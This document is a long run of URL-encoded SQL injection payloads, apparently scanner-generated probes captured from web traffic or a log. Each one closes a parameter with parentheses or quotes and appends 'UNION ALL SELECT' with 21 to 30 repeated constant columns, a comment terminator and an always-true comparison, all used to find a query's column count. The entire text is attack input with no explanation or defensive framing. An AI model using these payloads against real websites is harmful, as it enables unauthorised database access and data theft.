-3514%29%20UNION%20ALL%20SELECT%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900--%20%20AND%20%288331%3D8331 -1993%29%20UNION%20ALL%20SELECT%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785%2C%207785--%20%20AND%20%286986%3D6986 -5562%29%20UNION%20ALL%20SELECT%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695--%20%20AND%20%286416%3D6416 -1745%29%20UNION%20ALL%20SELECT%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973--%20%20AND%20%289215%3D9215 -1819%29%20UNION%20ALL%20SELECT%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609--%20%20AND%20%289951%3D9951 -3115%29%29%20UNION%20ALL%20SELECT%208980%2C%208980%2C%208980%2C%208980%2C%208980%2C%208980%2C%208980%2C%208980%2C%208980%2C%208980%2C%208980%2C%208980%2C%208980%2C%208980%2C%208980%2C%208980%2C%208980%2C%208980%2C%208980%2C%208980%2C%208980--%20%20AND%20%28%283790%3D3790 -9334%29%29%20UNION%20ALL%20SELECT%206325%2C%206325%2C%206325%2C%206325%2C%206325%2C%206325%2C%206325%2C%206325%2C%206325%2C%206325%2C%206325%2C%206325%2C%206325%2C%206325%2C%206325%2C%206325%2C%206325%2C%206325%2C%206325%2C%206325%2C%206325%2C%206325--%20%20AND%20%28%288613%3D8613 -7060%29%29%20UNION%20ALL%20SELECT%201547%2C%201547%2C%201547%2C%201547%2C%201547%2C%201547%2C%201547%2C%201547%2C%201547%2C%201547%2C%201547%2C%201547%2C%201547%2C%201547%2C%201547%2C%201547%2C%201547%2C%201547%2C%201547%2C%201547%2C%201547%2C%201547%2C%201547--%20%20AND%20%28%282754%3D2754 -3492%29%29%20UNION%20ALL%20SELECT%207171%2C%207171%2C%207171%2C%207171%2C%207171%2C%207171%2C%207171%2C%207171%2C%207171%2C%207171%2C%207171%2C%207171%2C%207171%2C%207171%2C%207171%2C%207171%2C%207171%2C%207171%2C%207171%2C%207171%2C%207171%2C%207171%2C%207171%2C%207171--%20%20AND%20%28%285856%3D5856 -8203%29%29%20UNION%20ALL%20SELECT%204061%2C%204061%2C%204061%2C%204061%2C%204061%2C%204061%2C%204061%2C%204061%2C%204061%2C%204061%2C%204061%2C%204061%2C%204061%2C%204061%2C%204061%2C%204061%2C%204061%2C%204061%2C%204061%2C%204061%2C%204061%2C%204061%2C%204061%2C%204061%2C%204061--%20%20AND%20%28%283462%3D3462 -9880%29%29%20UNION%20ALL%20SELECT%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196--%20%20AND%20%28%283756%3D3756 -5542%29%29%20UNION%20ALL%20SELECT%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497--%20%20AND%20%28%282554%3D2554 -1379%29%29%20UNION%20ALL%20SELECT%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571%2C%201571--%20%20AND%20%28%282205%3D2205 -3151%29%29%20UNION%20ALL%20SELECT%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096--%20%20AND%20%28%283120%3D3120 -6297%29%29%20UNION%20ALL%20SELECT%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748%2C%207748--%20%20AND%20%28%289732%3D9732 -1286%29%29%29%20UNION%20ALL%20SELECT%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710--%20%20AND%20%28%28%283400%3D3400 -7197%29%29%29%20UNION%20ALL%20SELECT%209805%2C%209805%2C%209805%2C%209805%2C%209805%2C%209805%2C%209805%2C%209805%2C%209805%2C%209805%2C%209805%2C%209805%2C%209805%2C%209805%2C%209805%2C%209805%2C%209805%2C%209805%2C%209805%2C%209805%2C%209805%2C%209805--%20%20AND%20%28%28%288674%3D8674 -2111%29%29%29%20UNION%20ALL%20SELECT%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691--%20%20AND%20%28%28%285227%3D5227 -2547%29%29%29%20UNION%20ALL%20SELECT%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538--%20%20AND%20%28%28%281368%3D1368 -1178%29%29%29%20UNION%20ALL%20SELECT%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356--%20%20AND%20%28%28%286394%3D6394 -3597%29%29%29%20UNION%20ALL%20SELECT%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139--%20%20AND%20%28%28%287732%3D7732 -3585%29%29%29%20UNION%20ALL%20SELECT%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119--%20%20AND%20%28%28%285669%3D5669 -8744%29%29%29%20UNION%20ALL%20SELECT%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607%2C%202607--%20%20AND%20%28%28%286230%3D6230 -6234%29%29%29%20UNION%20ALL%20SELECT%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648%2C%206648--%20%20AND%20%28%28%287682%3D7682 -1421%29%29%29%20UNION%20ALL%20SELECT%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179%2C%209179--%20%20AND%20%28%28%284416%3D4416 -7481%20UNION%20ALL%20SELECT%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140--%20 -3046%20UNION%20ALL%20SELECT%201348%2C%201348%2C%201348%2C%201348%2C%201348%2C%201348%2C%201348%2C%201348%2C%201348%2C%201348%2C%201348%2C%201348%2C%201348%2C%201348%2C%201348%2C%201348%2C%201348%2C%201348%2C%201348%2C%201348%2C%201348%2C%201348--%20 -9812%20UNION%20ALL%20SELECT%205822%2C%205822%2C%205822%2C%205822%2C%205822%2C%205822%2C%205822%2C%205822%2C%205822%2C%205822%2C%205822%2C%205822%2C%205822%2C%205822%2C%205822%2C%205822%2C%205822%2C%205822%2C%205822%2C%205822%2C%205822%2C%205822%2C%205822--%20 -9955%20UNION%20ALL%20SELECT%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910--%20 -2378%20UNION%20ALL%20SELECT%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195--%20 -9506%20UNION%20ALL%20SELECT%204892%2C%204892%2C%204892%2C%204892%2C%204892%2C%204892%2C%204892%2C%204892%2C%204892%2C%204892%2C%204892%2C%204892%2C%204892%2C%204892%2C%204892%2C%204892%2C%204892%2C%204892%2C%204892%2C%204892%2C%204892%2C%204892%2C%204892%2C%204892%2C%204892%2C%204892--%20 -3733%20UNION%20ALL%20SELECT%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018--%20 -6086%20UNION%20ALL%20SELECT%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413--%20 -3758%20UNION%20ALL%20SELECT%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662--%20 -9006%20UNION%20ALL%20SELECT%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543%2C%204543--%20 -7679%27%29%20UNION%20ALL%20SELECT%205266%2C%205266%2C%205266%2C%205266%2C%205266%2C%205266%2C%205266%2C%205266%2C%205266%2C%205266%2C%205266%2C%205266%2C%205266%2C%205266%2C%205266%2C%205266%2C%205266%2C%205266%2C%205266%2C%205266%2C%205266--%20%20AND%20%28%27ongE%27%3D%27ongE -3707%27%29%20UNION%20ALL%20SELECT%204776%2C%204776%2C%204776%2C%204776%2C%204776%2C%204776%2C%204776%2C%204776%2C%204776%2C%204776%2C%204776%2C%204776%2C%204776%2C%204776%2C%204776%2C%204776%2C%204776%2C%204776%2C%204776%2C%204776%2C%204776%2C%204776--%20%20AND%20%28%27rcRN%27%3D%27rcRN -7072%27%29%20UNION%20ALL%20SELECT%202496%2C%202496%2C%202496%2C%202496%2C%202496%2C%202496%2C%202496%2C%202496%2C%202496%2C%202496%2C%202496%2C%202496%2C%202496%2C%202496%2C%202496%2C%202496%2C%202496%2C%202496%2C%202496%2C%202496%2C%202496%2C%202496%2C%202496--%20%20AND%20%28%27yiwt%27%3D%27yiwt -2219%27%29%20UNION%20ALL%20SELECT%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651--%20%20AND%20%28%27jaOR%27%3D%27jaOR -3549%27%29%20UNION%20ALL%20SELECT%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514--%20%20AND%20%28%27twtt%27%3D%27twtt -2837%27%29%20UNION%20ALL%20SELECT%202014%2C%202014%2C%202014%2C%202014%2C%202014%2C%202014%2C%202014%2C%202014%2C%202014%2C%202014%2C%202014%2C%202014%2C%202014%2C%202014%2C%202014%2C%202014%2C%202014%2C%202014%2C%202014%2C%202014%2C%202014%2C%202014%2C%202014%2C%202014%2C%202014%2C%202014--%20%20AND%20%28%27iyGT%27%3D%27iyGT -9279%27%29%20UNION%20ALL%20SELECT%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524%2C%204524--%20%20AND%20%28%27wbnA%27%3D%27wbnA -3047%27%29%20UNION%20ALL%20SELECT%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610%2C%201610--%20%20AND%20%28%27zGsA%27%3D%27zGsA -6273%27%29%20UNION%20ALL%20SELECT%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340--%20%20AND%20%28%27oljA%27%3D%27oljA -3796%27%29%20UNION%20ALL%20SELECT%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185%2C%206185--%20%20AND%20%28%27xBGY%27%3D%27xBGY -7402%27%29%29%20UNION%20ALL%20SELECT%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829--%20%20AND%20%28%28%27hzHx%27%3D%27hzHx -3842%27%29%29%20UNION%20ALL%20SELECT%203814%2C%203814%2C%203814%2C%203814%2C%203814%2C%203814%2C%203814%2C%203814%2C%203814%2C%203814%2C%203814%2C%203814%2C%203814%2C%203814%2C%203814%2C%203814%2C%203814%2C%203814%2C%203814%2C%203814%2C%203814%2C%203814--%20%20AND%20%28%28%27NAzl%27%3D%27NAzl -4037%27%29%29%20UNION%20ALL%20SELECT%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242--%20%20AND%20%28%28%27GZrH%27%3D%27GZrH -5460%27%29%29%20UNION%20ALL%20SELECT%209804%2C%209804%2C%209804%2C%209804%2C%209804%2C%209804%2C%209804%2C%209804%2C%209804%2C%209804%2C%209804%2C%209804%2C%209804%2C%209804%2C%209804%2C%209804%2C%209804%2C%209804%2C%209804%2C%209804%2C%209804%2C%209804%2C%209804%2C%209804--%20%20AND%20%28%28%27cjDx%27%3D%27cjDx -7807%27%29%29%20UNION%20ALL%20SELECT%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178--%20%20AND%20%28%28%27cSBL%27%3D%27cSBL -7462%27%29%29%20UNION%20ALL%20SELECT%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921--%20%20AND%20%28%28%27IFcK%27%3D%27IFcK -2484%27%29%29%20UNION%20ALL%20SELECT%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754--%20%20AND%20%28%28%27BOEO%27%3D%27BOEO -1947%27%29%29%20UNION%20ALL%20SELECT%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423%2C%201423--%20%20AND%20%28%28%27fcMc%27%3D%27fcMc -2961%27%29%29%20UNION%20ALL%20SELECT%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820--%20%20AND%20%28%28%27xVCf%27%3D%27xVCf -2583%27%29%29%20UNION%20ALL%20SELECT%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026%2C%201026--%20%20AND%20%28%28%27lNXP%27%3D%27lNXP -8791%27%29%29%29%20UNION%20ALL%20SELECT%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680--%20%20AND%20%28%28%28%27tuEH%27%3D%27tuEH -3041%27%29%29%29%20UNION%20ALL%20SELECT%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783--%20%20AND%20%28%28%28%27RVch%27%3D%27RVch -7833%27%29%29%29%20UNION%20ALL%20SELECT%201765%2C%201765%2C%201765%2C%201765%2C%201765%2C%201765%2C%201765%2C%201765%2C%201765%2C%201765%2C%201765%2C%201765%2C%201765%2C%201765%2C%201765%2C%201765%2C%201765%2C%201765%2C%201765%2C%201765%2C%201765%2C%201765%2C%201765--%20%20AND%20%28%28%28%27YEyu%27%3D%27YEyu -7911%27%29%29%29%20UNION%20ALL%20SELECT%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531--%20%20AND%20%28%28%28%27eVqA%27%3D%27eVqA -2253%27%29%29%29%20UNION%20ALL%20SELECT%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295--%20%20AND%20%28%28%28%27MruR%27%3D%27MruR -2045%27%29%29%29%20UNION%20ALL%20SELECT%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256--%20%20AND%20%28%28%28%27rCRX%27%3D%27rCRX -3721%27%29%29%29%20UNION%20ALL%20SELECT%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392--%20%20AND%20%28%28%28%27AJxc%27%3D%27AJxc -2243%27%29%29%29%20UNION%20ALL%20SELECT%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262--%20%20AND%20%28%28%28%27FydK%27%3D%27FydK -5638%27%29%29%29%20UNION%20ALL%20SELECT%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101%2C%206101--%20%20AND%20%28%28%28%27UFcl%27%3D%27UFcl -9279%27%29%29%29%20UNION%20ALL%20SELECT%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671--%20%20AND%20%28%28%28%27qhio%27%3D%27qhio -9714%27%20UNION%20ALL%20SELECT%205437%2C%205437%2C%205437%2C%205437%2C%205437%2C%205437%2C%205437%2C%205437%2C%205437%2C%205437%2C%205437%2C%205437%2C%205437%2C%205437%2C%205437%2C%205437%2C%205437%2C%205437%2C%205437%2C%205437%2C%205437--%20%20AND%20%27fcWn%27%3D%27fcWn -7718%27%20UNION%20ALL%20SELECT%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052--%20%20AND%20%27ZFuM%27%3D%27ZFuM -7852%27%20UNION%20ALL%20SELECT%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543--%20%20AND%20%27CZrZ%27%3D%27CZrZ -6619%27%20UNION%20ALL%20SELECT%208163%2C%208163%2C%208163%2C%208163%2C%208163%2C%208163%2C%208163%2C%208163%2C%208163%2C%208163%2C%208163%2C%208163%2C%208163%2C%208163%2C%208163%2C%208163%2C%208163%2C%208163%2C%208163%2C%208163%2C%208163%2C%208163%2C%208163%2C%208163--%20%20AND%20%27pQGF%27%3D%27pQGF -6714%27%20UNION%20ALL%20SELECT%205635%2C%205635%2C%205635%2C%205635%2C%205635%2C%205635%2C%205635%2C%205635%2C%205635%2C%205635%2C%205635%2C%205635%2C%205635%2C%205635%2C%205635%2C%205635%2C%205635%2C%205635%2C%205635%2C%205635%2C%205635%2C%205635%2C%205635%2C%205635%2C%205635--%20%20AND%20%27wNIK%27%3D%27wNIK -4443%27%20UNION%20ALL%20SELECT%201748%2C%201748%2C%201748%2C%201748%2C%201748%2C%201748%2C%201748%2C%201748%2C%201748%2C%201748%2C%201748%2C%201748%2C%201748%2C%201748%2C%201748%2C%201748%2C%201748%2C%201748%2C%201748%2C%201748%2C%201748%2C%201748%2C%201748%2C%201748%2C%201748%2C%201748--%20%20AND%20%27vCbX%27%3D%27vCbX -2433%27%20UNION%20ALL%20SELECT%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073%2C%205073--%20%20AND%20%27UNja%27%3D%27UNja -1137%27%20UNION%20ALL%20SELECT%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023--%20%20AND%20%27MTeR%27%3D%27MTeR -6823%27%20UNION%20ALL%20SELECT%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839%2C%204839--%20%20AND%20%27VlQa%27%3D%27VlQa -3983%27%20UNION%20ALL%20SELECT%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236--%20%20AND%20%27uDgH%27%3D%27uDgH -2607%27%29%20UNION%20ALL%20SELECT%201936%2C%201936%2C%201936%2C%201936%2C%201936%2C%201936%2C%201936%2C%201936%2C%201936%2C%201936%2C%201936%2C%201936%2C%201936%2C%201936%2C%201936%2C%201936%2C%201936%2C%201936%2C%201936%2C%201936%2C%201936--%20%20AND%20%28%27hSKb%27%20LIKE%20%27hSKb 